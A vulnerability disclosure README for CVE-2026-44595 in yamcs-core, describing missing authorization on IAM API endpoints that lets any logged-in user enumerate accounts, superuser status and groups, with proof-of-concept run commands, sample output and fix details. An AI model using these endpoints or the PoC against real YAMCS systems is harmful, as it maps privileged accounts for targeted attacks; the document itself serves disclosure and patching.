ex-cal1bur/CVE-2026-44595

# CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API ## Summary The IAM API endpoints (`listUsers`, `getUser`, `listGroups`, `getGroup`) in `yamcs-core` do not enforce the required `SystemPrivilege.ControlAccess` check. Any authenticated user — even one with no privileges — can enumerate all user accounts, superuser status, and group memberships. | Field | Value | |-------|-------| | **CVE** | CVE-2026-44595 | | **Severity** | MEDIUM (CVSS 4.3) | | **CWE** | CWE-862: Missing Authorization | | **Affected** | yamcs-core < 5.12.7 | | **Fixed in** | yamcs-core 5.12.7 | | **Advisory** | [GHSA-p2rj-mrmc-9w29](https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29) | ## Vulnerability Details The following endpoints are missing the `SystemPrivilege.ControlAccess` authorization check: - `GET /api/iam/users` — lists all users - `GET /api/iam/users/{name}` — gets user details - `GET /api/iam/groups` — lists all groups - `GET /api/iam/groups/{name}` — gets group details A low-privilege user can call these endpoints and retrieve all usernames, superuser flags, group memberships, and identity provider information. ## Proof of Concept pip install requests python3 poc.py http://localhost:8090 testuser testpassword Expected output on vulnerable instance: [2] Listing ALL users (IAM endpoint)... Status: HTTP 200 [!!!] VULNERABLE: 3 users enumerated -> admin [SUPERUSER] -> operator [regular] -> testuser [regular] ## Impact An attacker with any valid account can map the entire user structure of the YAMCS instance — identifying superuser accounts for targeted attacks, enumerating operator accounts, and understanding group-based access controls. ## Fix Upgrade to `yamcs-core >= 5.12.7`. ## Timeline | Date | Event | |------|-------| | 2026-05 | Vulnerability reported | | 2026-05-27 | Fix released in yamcs-core 5.12.7 | | 2026-05-27 | Public advisory published | ## Researcher **Daniel Miranda Barcelona (Excal1bur)** - GitHub: [https://github.com/ex-cal1bur](https://github.com/ex-cal1bur) - LinkedIn: [https://linkedin.com/in/daniel-miranda-barcelona](https://linkedin.com/in/daniel-miranda-barcelona) - Blog: [https://thedumpster.es](https://thedumpster.es)